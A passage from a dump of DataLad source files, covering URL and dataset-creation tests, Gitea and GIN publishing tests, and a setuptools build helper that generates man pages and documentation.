test_is_url_quoted():\n ok_(is_url_quoted('%22%27%3ba&b&cd|'))\n ok_(not is_url_quoted('a b'))\n\n\ndef test_get_response_stamp():\n r = get_url_response_stamp(\"http://www.example.com/1.dat\",\n {'Content-length': '101',\n 'Last-modified': 'Wed, 01 May 2013 03:02:00 GMT'})\n eq_(r['size'], 101)\n eq_(r['mtime'], 1367377320)\n eq_(r['url'], \"http://www.example.com/1.dat\")\n" }, { "alpha_fraction": 0.5237467288970947, "alphanum_fraction": 0.5316622853279114, "avg_line_length": 25.13793182373047, "blob_id": "57b3df74a3f57f091e16ae01d70096e305927a1e", "content_id": "d731e537e4df502ce4c7257d9b8abaedd7f57d92", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distributed/tests/test_create_sibling_gitea.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on Gitea\"\"\"\n\n\nfrom datalad.api import create_sibling_gitea\nfrom datalad.tests.utils_pytest import (\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gitea(path=None):\n check4real(\n create_sibling_gitea,\n path,\n 'gitea',\n 'https://try.gitea.io',\n 'api/v1/repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.5452522039413452, "alphanum_fraction": 0.5504450798034668, "avg_line_length": 26.510204315185547, "blob_id": "4732fc99aaa5ad40c466af862db6b67e9e4de09b", "content_id": "43518ba53a79120e2e80ed5d25fb0642ac2b4635", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1348, "license_type": "permissive", "max_line_length": 79, "num_lines": 49, "path": "/datalad/distributed/tests/test_create_sibling_gin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GIN\"\"\"\n\n\nfrom datalad.api import create_sibling_gin\nfrom datalad.tests.utils_pytest import (\n assert_in_results,\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\ndef check_push(ds):\n # create a file and push it to GIN to see of the\n # access is set up properly\n (ds.pathobj / 'file').write_text('some')\n ds.save()\n assert_in_results(\n ds.push(to='gin', result_renderer='disabled'),\n action='copy',\n status='ok',\n path=str(ds.pathobj / 'file')\n )\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gin(path=None):\n check4real(\n create_sibling_gin,\n path,\n 'gin',\n 'https://gin.g-node.org',\n # when testing locally, you might want to use your\n # own GIN account to not have to fiddle with the key\n # setup\n #'api/v1/repos/mih/{reponame}',\n 'api/v1/repos/dataladtester/{reponame}',\n access_protocol='https-ssh',\n moretests=check_push,\n )\n" }, { "alpha_fraction": 0.5576720237731934, "alphanum_fraction": 0.5614365339279175, "avg_line_length": 34.800540924072266, "blob_id": "b8246292575051ad4be2b59738ca4b0c58912991", "content_id": "b845f5e045c7d0eb2936ccc57e26366683a50739", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13282, "license_type": "permissive", "max_line_length": 98, "num_lines": 371, "path": "/_datalad_build_support/setup.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nimport datetime\nimport os\nimport platform\nimport sys\nfrom os import (\n linesep,\n makedirs,\n)\nfrom os.path import dirname\nfrom os.path import join as opj\nfrom os.path import sep as pathsep\nfrom os.path import splitext\n\nimport setuptools\nfrom genericpath import exists\nfrom packaging.version import Version\nfrom setuptools import (\n Command,\n DistutilsOptionError,\n find_namespace_packages,\n findall,\n setup,\n)\n\nfrom . import formatters as fmt\n\n\ndef _path_rel2file(*p):\n # dirname instead of joining with pardir so it works if\n # datalad_build_support/ is just symlinked into some extension\n # while developing\n return opj(dirname(dirname(__file__)), *p)\n\n\ndef get_version(name):\n \"\"\"Determine version via importlib_metadata\n\n Parameters\n ----------\n name: str\n Name of the folder (package) where from to read version.py\n \"\"\"\n # delay import so we do not require it for a simple setup stage\n try:\n from importlib.metadata import version as importlib_version\n except ImportError:\n # TODO - remove whenever python >= 3.8\n from importlib_metadata import version as importlib_version\n return importlib_version(name)\n\n\nclass BuildManPage(Command):\n # The BuildManPage code was originally distributed\n # under the same License of Python\n # Copyright (c) 2014 Oz Nahum Tiram <[email protected]>\n\n description = 'Generate man page from an ArgumentParser instance.'\n\n user_options = [\n ('manpath=', None, 'output path for manpages'),\n ('rstpath=', None, 'output path for RST files'),\n ('parser=', None, 'module path to an ArgumentParser instance'\n '(e.g. mymod:func, where func is a method or function which return'\n 'a dict with one or more arparse.ArgumentParser instances.'),\n ]\n\n def initialize_options(self):\n self.manpath = opj('build', 'man')\n self.rstpath = opj('docs', 'source', 'generated', 'man')\n self.parser = 'datalad.cli.parser:setup_parser'\n\n def finalize_options(self):\n if self.manpath is None:\n raise DistutilsOptionError('\\'manpath\\' option is required')\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n if self.parser is None:\n raise DistutilsOptionError('\\'parser\\' option is required')\n self.manpath = _path_rel2file(self.manpath)\n self.rstpath = _path_rel2file(self.rstpath)\n mod_name, func_name = self.parser.split(':')\n fromlist = mod_name.split('.')\n try:\n mod = __import__(mod_name, fromlist=fromlist)\n self._parser = getattr(mod, func_name)(\n ['datalad'],\n formatter_class=fmt.ManPageFormatter,\n return_subparsers=True,\n help_ignore_extensions=True)\n\n except ImportError as err:\n raise err\n\n self.announce('Writing man page(s) to %s' % self.manpath)\n self._today = datetime.date.today()\n\n @classmethod\n def handle_module(cls, mod_name, **kwargs):\n \"\"\"Module specific handling.\n\n This particular one does\n 1. Memorize (at class level) the module name of interest here\n 2. Check if 'datalad.extensions' are specified for the module,\n and then analyzes them to obtain command names it provides\n\n If cmdline commands are found, its entries are to be used instead of\n the ones in datalad's _parser.\n\n Parameters\n ----------\n **kwargs:\n all the kwargs which might be provided to setuptools.setup\n \"\"\"\n cls.mod_name = mod_name\n\n exts = kwargs.get('entry_points', {}).get('datalad.extensions', [])\n for ext in exts:\n assert '=' in ext # should be label=module:obj\n ext_label, mod_obj = ext.split('=', 1)\n assert ':' in mod_obj # should be module:obj\n mod, obj = mod_obj.split(':', 1)\n assert mod_name == mod # AFAIK should be identical\n\n mod = __import__(mod_name)\n if hasattr(mod, obj):\n command_suite = getattr(mod, obj)\n assert len(command_suite) == 2 # as far as I see it\n if not hasattr(cls, 'cmdline_names'):\n cls.cmdline_names = []\n cls.cmdline_names += [\n cmd\n for _, _, cmd, _ in command_suite[1]\n ]\n\n def run(self):\n\n dist = self.distribution\n #homepage = dist.get_url()\n #appname = self._parser.prog\n appname = 'datalad'\n\n sections = {\n 'Authors': \"\"\"{0} is developed by {1} <{2}>.\"\"\".format(\n appname, dist.get_author(), dist.get_author_email()),\n }\n\n for cls, opath, ext in ((fmt.ManPageFormatter, self.manpath, '1'),\n (fmt.RSTManPageFormatter, self.rstpath, 'rst')):\n if not os.path.exists(opath):\n os.makedirs(opath)\n for cmdname in getattr(self, 'cmdline_names', list(self._parser)):\n p = self._parser[cmdname]\n cmdname = \"{0}{1}\".format(\n 'datalad ' if cmdname != 'datalad' else '',\n cmdname)\n format = cls(\n cmdname,\n ext_sections=sections,\n version=get_version(getattr(self, 'mod_name', appname)))\n formatted = format.format_man_page(p)\n with open(opj(opath, '{0}.{1}'.format(\n cmdname.replace(' ', '-'),\n ext)),\n 'w') as f:\n f.write(formatted)\n\n\nclass BuildRSTExamplesFromScripts(Command):\n description = 'Generate RST variants of example shell scripts.'\n\n user_options = [\n ('expath=', None, 'path to look for example scripts'),\n ('rstpath=', None, 'output path for RST files'),\n ]\n\n def initialize_options(self):\n self.expath = opj('docs', 'examples')\n self.rstpath = opj('docs', 'source', 'generated', 'examples')\n\n def finalize_options(self):\n if self.expath is None:\n raise DistutilsOptionError('\\'expath\\' option is required')\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n self.expath = _path_rel2file(self.expath)\n self.rstpath = _path_rel2file(self.rstpath)\n self.announce('Converting example scripts')\n\n def run(self):\n opath = self.rstpath\n if not os.path.exists(opath):\n os.makedirs(opath)\n\n from glob import glob\n for example in glob(opj(self.expath, '*.sh')):\n exname = os.path.basename(example)[:-3]\n with open(opj(opath, '{0}.rst'.format(exname)), 'w') as out:\n fmt.cmdline_example_to_rst(\n open(example),\n out=out,\n ref='_example_{0}'.format(exname))\n\n\nclass BuildConfigInfo(Command):\n description = 'Generate RST documentation for all config items.'\n\n user_options = [\n ('rstpath=', None, 'output path for RST file'),\n ]\n\n def initialize_options(self):\n self.rstpath = opj('docs', 'source', 'generated', 'cfginfo')\n\n def finalize_options(self):\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n self.rstpath = _path_rel2file(self.rstpath)\n self.announce('Generating configuration documentation')\n\n def run(self):\n opath = self.rstpath\n if not os.path.exists(opath):\n os.makedirs(opath)\n\n from datalad.dochelpers import _indent\n from datalad.interface.common_cfg import definitions as cfgdefs\n\n categories = {\n 'global': {},\n 'local': {},\n 'dataset': {},\n 'misc': {}\n }\n for term, v in cfgdefs.items():\n categories[v.get('destination', 'misc')][term] = v\n\n for cat in categories:\n with open(opj(opath, '{}.rst.in'.format(cat)), 'w') as rst:\n rst.write('.. glossary::\\n')\n for term, v in sorted(categories[cat].items(), key=lambda x: x[0]):\n rst.write(_indent(term, '\\n '))\n qtype, docs = v.get('ui', (None, {}))\n desc_tmpl = '\\n'\n if 'title' in docs:\n desc_tmpl += '{title}:\\n'\n if 'text' in docs:\n desc_tmpl += '{text}\\n'\n if 'default' in v:\n default = v['default']\n if hasattr(default, 'replace'):\n # protect against leaking specific home dirs\n v['default'] = default.replace(os.path.expanduser('~'), '~')\n desc_tmpl += 'Default: {default}\\n'\n if 'type' in v:\n type_ = v['type']\n if hasattr(type_, 'long_description'):\n type_ = type_.long_description()\n else:\n type_ = type_.__name__\n desc_tmpl += '\\n[{type}]\\n'\n v['type'] = type_\n if desc_tmpl == '\\n':\n # we need something to avoid joining terms\n desc_tmpl += 'undocumented\\n'\n v.update(docs)\n rst.write(_indent(desc_tmpl.format(**v), ' '))\n\n\ndef get_long_description_from_README():\n \"\"\"Read README.md, convert to .rst using pypandoc\n\n If pypandoc is not available or fails - just output original .md.\n\n Returns\n -------\n dict\n with keys long_description and possibly long_description_content_type\n for newer setuptools which support uploading of markdown as is.\n \"\"\"\n # PyPI used to not render markdown. Workaround for a sane appearance\n # https://github.com/pypa/pypi-legacy/issues/148#issuecomment-227757822\n # is still in place for older setuptools\n\n README = opj(_path_rel2file('README.md'))\n\n ret = {}\n if Version(setuptools.__version__) >= Version('38.6.0'):\n # check than this\n ret['long_description'] = open(README).read()\n ret['long_description_content_type'] = 'text/markdown'\n return ret\n\n # Convert or fall-back\n try:\n import pypandoc\n return {'long_description': pypandoc.convert(README, 'rst')}\n except (ImportError, OSError) as exc:\n # attempting to install pandoc via brew on OSX currently hangs and\n # pypandoc imports but throws OSError demanding pandoc\n print(\n \"WARNING: pypandoc failed to import or thrown an error while \"\n \"converting\"\n \" README.md to RST: %r .md version will be used as is\" % exc\n )\n return {'long_description': open(README).read()}\n\n\ndef findsome(subdir, extensions):\n \"\"\"Find files under subdir having specified extensions\n\n Leading directory (datalad) gets stripped\n \"\"\"\n return [\n f.split(pathsep, 1)[1] for f in findall(opj('datalad', subdir))\n if splitext(f)[-1].lstrip('.') in extensions\n ]\n\n\ndef datalad_setup(name, **kwargs):\n \"\"\"A helper for a typical invocation of setuptools.setup.\n\n If not provided in kwargs, following fields will be autoset to the defaults\n or obtained from the present on the file system files:\n\n - author\n - author_email\n - packages -- all found packages which start with `name`\n - long_description -- converted to .rst using pypandoc README.md\n - version -- parsed `__version__` within `name/version.py`\n\n Parameters\n ----------\n name: str\n Name of the Python package\n **kwargs:\n The rest of the keyword arguments passed to setuptools.setup as is\n \"\"\"\n # Simple defaults\n for k, v in {\n 'author': \"The DataLad Team and Contributors\",\n 'author_email': \"[email protected]\"\n }.items():\n if kwargs.get(k) is None:\n kwargs[k] = v\n\n # More complex, requiring some function call\n\n # Only recentish versions of find_packages support include\n # packages = find_packages('.', include=['datalad*'])\n # so we will filter manually for maximal compatibility\n if kwargs.get('packages') is None:\n # Use find_namespace_packages() in order to include folders that\n # contain data files but no Python code\n kwargs['packages'] = [pkg for pkg in find_namespace_packages('.') if pkg.startswith(name)]\n if kwargs.get('long_description') is None:\n kwargs.update(get_long_description_from_README())\n\n cmdclass = kwargs.get('cmdclass', {})\n # Check if command needs some module specific handling\n for v in cmdclass.values():\n if hasattr(v, 'handle_module'):\n getattr(v, 'handle_module')(name, **kwargs)\n return setup(name=name, **kwargs)\n" }, { "alpha_fraction": 0.6104670166969299, "alphanum_fraction": 0.6170840859413147, "avg_line_length": 32.67587661743164, "blob_id": "9e69f8022756be12d69b58c7ead6d5024856a672", "content_id": "6757b599ecf5e851657e5378b82def01eb7eee71", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18286, "license_type": "permissive", "max_line_length": 101, "num_lines": 543, "path": "/datalad/core/local/tests/test_create.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create action\n\n\"\"\"\n\nimport os\nimport os.path as op\n\nimport pytest\n\nfrom datalad.api import create\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_status,\n eq_,\n has_symlink_capability,\n ok_,\n ok_exists,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n_dataset_hierarchy_template = {\n 'origin': {\n 'file1': '',\n # Add prefix to prevent DATALAD_TESTS_OBSCURE_PREFIX=- from working as\n # intended. 'git submodule add' cannot handle paths starting with -.\n u'ds-' + OBSCURE_FILENAME: {\n 'file2': 'file2',\n 'subsub': {\n 'file3': 'file3'}}}}\n\nraw = dict(return_type='list', result_filter=None, result_xfm=None, on_failure='ignore')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_create_raises(path=None, outside_path=None):\n ds = Dataset(path)\n # incompatible arguments (annex only):\n assert_raises(ValueError, ds.create, annex=False, description='some')\n\n with open(op.join(path, \"somefile.tst\"), 'w') as f:\n f.write(\"some\")\n # non-empty without `force`:\n assert_in_results(\n ds.create(force=False, **raw),\n status='error',\n message='will not create a dataset in a non-empty directory, use `--force` option to ignore')\n # non-empty with `force`:\n ds.create(force=True)\n # create sub outside of super:\n assert_in_results(\n ds.create(outside_path, **raw),\n status='error',\n message=(\n 'dataset containing given paths is not underneath the reference '\n 'dataset %s: %s', ds, outside_path))\n obscure_ds = u\"ds-\" + OBSCURE_FILENAME\n # create a sub:\n ds.create(obscure_ds)\n # fail when doing it again\n assert_in_results(\n ds.create(obscure_ds, **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n\n # now deinstall the sub and fail trying to create a new one at the\n # same location\n ds.drop(obscure_ds, what='all', reckless='kill', recursive=True)\n assert_in(obscure_ds, ds.subdatasets(state='absent', result_xfm='relpaths'))\n # and now should fail to also create inplace or under\n assert_in_results(\n ds.create(obscure_ds, **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n assert_in_results(\n ds.create(op.join(obscure_ds, 'subsub'), **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n os.makedirs(op.join(ds.path, 'down'))\n with open(op.join(ds.path, 'down', \"someotherfile.tst\"), 'w') as f:\n f.write(\"someother\")\n ds.save()\n assert_in_results(\n ds.create('down', **raw),\n status='error',\n message=('collision with content in parent dataset at %s: %s',\n ds.path,\n [str(ds.pathobj / 'down' / 'someotherfile.tst')]),\n )\n\n\n@with_tempfile\ndef test_create_force_subds(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"subds\")\n # We get an error when trying calling create in an existing subdataset\n assert_in_results(\n subds.create(force=False, **raw),\n status=\"error\")\n # ... but we can force it\n assert_in_results(\n subds.create(force=True, **raw),\n status=\"ok\")\n # ... even if it is uninstalled.\n subds.drop(what='all', reckless='kill', recursive=True)\n ok_(not subds.is_installed())\n assert_in_results(\n subds.create(force=True, **raw),\n status=\"ok\")\n\n\n@with_tempfile\n@with_tempfile\ndef test_create_curdir(path=None, path2=None):\n with chpwd(path, mkdir=True):\n create()\n ds = Dataset(path)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=True)\n\n with chpwd(path2, mkdir=True):\n create(annex=False)\n ds = Dataset(path2)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=False)\n ok_(op.exists(op.join(ds.path, '.noannex')))\n\n\n@with_tempfile\n@with_tempfile\ndef test_create(probe=None, path=None):\n # only as a probe whether this FS is a crippled one\n ar = AnnexRepo(probe, create=True)\n\n ds = Dataset(path)\n ds.create(\n description=\"funny\",\n # custom git init option\n initopts=dict(shared='world') if not ar.is_managed_branch() else None)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=True)\n\n # check default backend\n (ds.pathobj / \"f1\").write_text(\"1\")\n ds.save()\n eq_(ds.repo.get_file_backend([\"f1\"]), ['MD5E'])\n\n if not ar.is_managed_branch():\n eq_(ds.config.get(\"core.sharedrepository\"), '2')\n # check description in `info`\n cmlout = ds.repo.call_annex(['info'])\n assert_in('funny [here]', cmlout)\n # check dataset ID\n eq_(ds.config.get_value('datalad.dataset', 'id'),\n ds.id)\n\n\n@with_tempfile\ndef test_create_sub(path=None):\n\n ds = Dataset(path)\n ds.create()\n\n # 1. create sub and add to super:\n subds = ds.create(op.join(\"some\", \"what\", \"deeper\"))\n ok_(isinstance(subds, Dataset))\n ok_(subds.is_installed())\n assert_repo_status(subds.path, annex=True)\n assert_in(\n 'submodule.some/what/deeper.datalad-id={}'.format(\n subds.id),\n list(ds.repo.call_git_items_(['config', '--file', '.gitmodules',\n '--list'],\n read_only=True))\n )\n\n # subdataset is known to superdataset:\n assert_in(op.join(\"some\", \"what\", \"deeper\"),\n ds.subdatasets(result_xfm='relpaths'))\n # and was committed:\n assert_repo_status(ds.path)\n\n # subds finds superdataset\n ok_(subds.get_superdataset() == ds)\n\n # 2. create sub without adding to super:\n subds2 = Dataset(op.join(path, \"someother\")).create()\n ok_(isinstance(subds2, Dataset))\n ok_(subds2.is_installed())\n assert_repo_status(subds2.path, annex=True)\n\n # unknown to superdataset:\n assert_not_in(\"someother\", ds.subdatasets(result_xfm='relpaths'))\n\n # 3. create sub via super:\n subds3 = ds.create(\"third\", annex=False)\n ok_(isinstance(subds3, Dataset))\n ok_(subds3.is_installed())\n assert_repo_status(subds3.path, annex=False)\n assert_in(\"third\", ds.subdatasets(result_xfm='relpaths'))\n\n\n@with_tempfile\ndef test_create_sub_gh3463(path=None):\n ds = Dataset(path)\n ds.create()\n\n # Test non-bound call.\n with chpwd(ds.path):\n create(\"subds0\", dataset=\".\")\n assert_repo_status(ds.path)\n\n # Test command-line invocation directly.\n Runner(cwd=ds.path).run([\"datalad\", \"create\", \"-d.\", \"subds1\"])\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_create_dataset_same_as_path(path=None):\n with chpwd(path):\n ds = create(dataset=\".\", path=\".\")\n assert_repo_status(ds.path)\n\n\n@with_tempfile\ndef test_create_sub_dataset_dot_no_path(path=None):\n ds = Dataset(path)\n ds.create()\n\n # Test non-bound call.\n sub0_path = str(ds.pathobj / \"sub0\")\n os.mkdir(sub0_path)\n with chpwd(sub0_path):\n subds0 = create(dataset=\".\")\n assert_repo_status(ds.path, untracked=[subds0.path])\n assert_repo_status(subds0.path)\n\n # Test command-line invocation directly (regression from gh-3484).\n sub1_path = str(ds.pathobj / \"sub1\")\n os.mkdir(sub1_path)\n Runner(cwd=sub1_path).run([\"datalad\", \"create\", \"-d.\"])\n assert_repo_status(ds.path, untracked=[subds0.path, sub1_path])\n\n\n@with_tree(tree=_dataset_hierarchy_template)\ndef test_create_subdataset_hierarchy_from_top(path=None):\n # how it would look like to overlay a subdataset hierarchy onto\n # an existing directory tree\n ds = Dataset(op.join(path, 'origin')).create(force=True)\n # we got a dataset ....\n ok_(ds.is_installed())\n # ... but it has untracked content\n ok_(ds.repo.dirty)\n subds = ds.create(u\"ds-\" + OBSCURE_FILENAME, force=True)\n ok_(subds.is_installed())\n ok_(subds.repo.dirty)\n subsubds = subds.create('subsub', force=True)\n ok_(subsubds.is_installed())\n ok_(subsubds.repo.dirty)\n ok_(ds.id != subds.id != subsubds.id)\n ds.save(updated=True, recursive=True)\n # 'file*' in each repo was untracked before and should remain as such\n # (we don't want a #1419 resurrection\n ok_(ds.repo.dirty)\n ok_(subds.repo.dirty)\n ok_(subsubds.repo.dirty)\n # if we add these three, we should get clean\n ds.save([\n 'file1',\n op.join(subds.path, 'file2'),\n op.join(subsubds.path, 'file3')])\n assert_repo_status(ds.path)\n ok_(ds.id != subds.id != subsubds.id)\n\n\n@with_tempfile\ndef test_nested_create(path=None):\n # to document some more organic usage pattern\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n lvl2relpath = op.join('lvl1', 'lvl2')\n lvl2path = op.join(ds.path, lvl2relpath)\n os.makedirs(lvl2path)\n os.makedirs(op.join(ds.path, 'lvl1', 'empty'))\n with open(op.join(lvl2path, 'file'), 'w') as f:\n f.write('some')\n ok_(ds.save())\n # Empty directories are filtered out.\n assert_repo_status(ds.path, untracked=[])\n # later create subdataset in a fresh dir\n # WINDOWS FAILURE IS NEXT LINE\n subds1 = ds.create(op.join('lvl1', 'subds'))\n assert_repo_status(ds.path, untracked=[])\n eq_(ds.subdatasets(result_xfm='relpaths'), [op.join('lvl1', 'subds')])\n # later create subdataset in an existing empty dir\n subds2 = ds.create(op.join('lvl1', 'empty'))\n assert_repo_status(ds.path)\n # later try to wrap existing content into a new subdataset\n # but that won't work\n assert_in_results(\n ds.create(lvl2relpath, **raw),\n status='error',\n message=(\n 'collision with content in parent dataset at %s: %s',\n ds.path, [op.join(lvl2path, 'file')]))\n # even with force, as to do this properly complicated surgery would need to\n # take place\n # MIH disable shaky test till proper dedicated upfront check is in-place in `create`\n # gh-1725\n #assert_in_results(\n # ds.create(lvl2relpath, force=True,\n # on_failure='ignore', result_xfm=None, result_filter=None),\n # status='error', action='add')\n # only way to make it work is to unannex the content upfront\n ds.repo.call_annex(['unannex', op.join(lvl2relpath, 'file')])\n # nothing to save, git-annex commits the unannex itself, but only on v5\n ds.repo.commit()\n # still nothing without force\n # \"err='lvl1/lvl2' already exists in the index\"\n assert_in_results(\n ds.create(lvl2relpath, **raw),\n status='error',\n message='will not create a dataset in a non-empty directory, use `--force` option to ignore')\n # XXX even force doesn't help, because (I assume) GitPython doesn't update\n # its representation of the Git index properly\n ds.create(lvl2relpath, force=True)\n assert_in(lvl2relpath, ds.subdatasets(result_xfm='relpaths'))\n\n\n# Imported from #1016\n@with_tree({'ds2': {'file1.txt': 'some'}})\ndef test_saving_prior(topdir=None):\n # the problem is that we might be saving what is actually needed to be\n # \"created\"\n\n # we would like to place this structure into a hierarchy of two datasets\n # so we create first top one\n ds1 = create(topdir, force=True)\n # and everything is ok, stuff is not added BUT ds1 will be considered dirty\n assert_repo_status(ds1.path, untracked=['ds2'])\n # And then we would like to initiate a sub1 subdataset\n ds2 = create('ds2', dataset=ds1, force=True)\n # But what will happen is file1.txt under ds2 would get committed first into\n # ds1, and then the whole procedure actually crashes since because ds2/file1.txt\n # is committed -- ds2 is already known to git and it just pukes with a bit\n # confusing 'ds2' already exists in the index\n assert_in('ds2', ds1.subdatasets(result_xfm='relpaths'))\n\n\n@with_tempfile(mkdir=True)\ndef test_create_withcfg(path=None):\n ds = create(\n dataset=path,\n cfg_proc=['yoda'])\n assert_repo_status(path)\n assert (ds.pathobj / 'README.md').exists()\n\n # If we are creating a dataset within a reference dataset, we save _after_\n # the procedure runs.\n ds.create('subds', cfg_proc=['yoda'])\n assert_repo_status(path)\n assert (ds.pathobj / 'subds' / 'README.md').exists()\n\n\n@with_tempfile(mkdir=True)\ndef test_create_fake_dates(path=None):\n ds = create(path, fake_dates=True)\n\n ok_(ds.config.getbool(\"datalad\", \"fake-dates\"))\n ok_(ds.repo.fake_dates_enabled)\n\n # Another instance detects the fake date configuration.\n ok_(Dataset(path).repo.fake_dates_enabled)\n\n first_commit = ds.repo.get_revisions(options=[\"--reverse\", \"--all\"])[0]\n\n eq_(ds.config.obtain(\"datalad.fake-dates-start\") + 1,\n int(ds.repo.format_commit(\"%ct\", first_commit)))\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_passthrough(path=None):\n runner = Runner()\n _ = runner.run(\n ['datalad',\n '-c', 'annex.tune.objecthash1=true',\n '-c', 'annex.tune.objecthashlower=true',\n 'create', path])\n ds = Dataset(path)\n eq_(ds.config.get('annex.tune.objecthash1', None), 'true')\n eq_(ds.config.get('annex.tune.objecthashlower', None), 'true')\n\n\n@with_tree({\"empty\": {\".git\": {}, \"ds\": {}},\n \"nonempty\": {\".git\": {\"bogus\": \"content\"}, \"ds\": {}},\n \"git_with_head\": {\".git\": {\"HEAD\": \"\"}, \"ds\": {}}\n })\ndef test_empty_git_upstairs(topdir=None):\n # create() doesn't get confused by an empty .git/ upstairs (gh-3473)\n assert_in_results(\n create(op.join(topdir, \"empty\", \"ds\"), **raw),\n status=\"ok\", type=\"dataset\", action=\"create\")\n # ... and it will ignore non-meaningful content in .git\n assert_in_results(\n create(op.join(topdir, \"nonempty\", \"ds\"), **raw),\n status=\"ok\", type=\"dataset\", action=\"create\")\n # ... but it will raise if it detects a valid repo\n # (by existence of .git/HEAD as defined in GitRepo._valid_git_test_path)\n with assert_raises(CommandError):\n create(op.join(topdir, \"git_with_head\", \"ds\"), **raw)\n\n\n@with_tempfile(mkdir=True)\ndef check_create_obscure(create_kwargs, path):\n with chpwd(path):\n with swallow_outputs():\n ds = create(result_renderer=\"default\", **create_kwargs)\n ok_(ds.is_installed())\n\n\[email protected](\"kwarg\", [\"path\", \"dataset\"])\ndef test_create_with_obscure_name(kwarg):\n check_create_obscure, {\"kwarg\": OBSCURE_FILENAME}\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\ndef check_create_path_semantics(\n cwd, create_ds, path_arg, base_path, other_path):\n ds = Dataset(base_path).create()\n os.makedirs(op.join(ds.path, 'some'))\n target_path = ds.pathobj / \"some\" / \"what\" / \"deeper\"\n with chpwd(\n other_path if cwd == 'elsewhere' else\n base_path if cwd == 'parentds' else\n str(ds.pathobj / 'some') if cwd == 'subdir' else\n str(Path.cwd())):\n subds = create(\n dataset=ds.path if create_ds == 'abspath'\n else str(ds.pathobj.relative_to(cwd)) if create_ds == 'relpath'\n else ds if create_ds == 'instance'\n else create_ds,\n path=str(target_path) if path_arg == 'abspath'\n else str(target_path.relative_to(ds.pathobj)) if path_arg == 'relpath'\n else op.join('what', 'deeper') if path_arg == 'subdir_relpath'\n else path_arg)\n eq_(subds.pathobj, target_path)\n\n\[email protected](\n \"cwd,create_ds,path_arg\",\n [\n ('subdir', None, 'subdir_relpath'),\n ('subdir', 'abspath', 'subdir_relpath'),\n ('subdir', 'abspath', 'abspath'),\n ('parentds', None, 'relpath'),\n ('parentds', 'abspath', 'relpath'),\n ('parentds', 'abspath', 'abspath'),\n (None, 'abspath', 'abspath'),\n (None, 'instance', 'abspath'),\n (None, 'instance', 'relpath'),\n ('elsewhere', 'abspath', 'abspath'),\n ('elsewhere', 'instance', 'abspath'),\n ('elsewhere', 'instance', 'relpath'),\n ]\n)\ndef test_create_relpath_semantics(cwd, create_ds, path_arg):\n check_create_path_semantics(cwd, create_ds, path_arg)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_gh2927(path=None, linkpath=None):\n if has_symlink_capability():\n # make it more complicated by default\n Path(linkpath).symlink_to(path, target_is_directory=True)\n path = linkpath\n ds = Dataset(path).create()\n ds.create('subds_clean')\n assert_status('ok', ds.create(op.join('subds_clean', 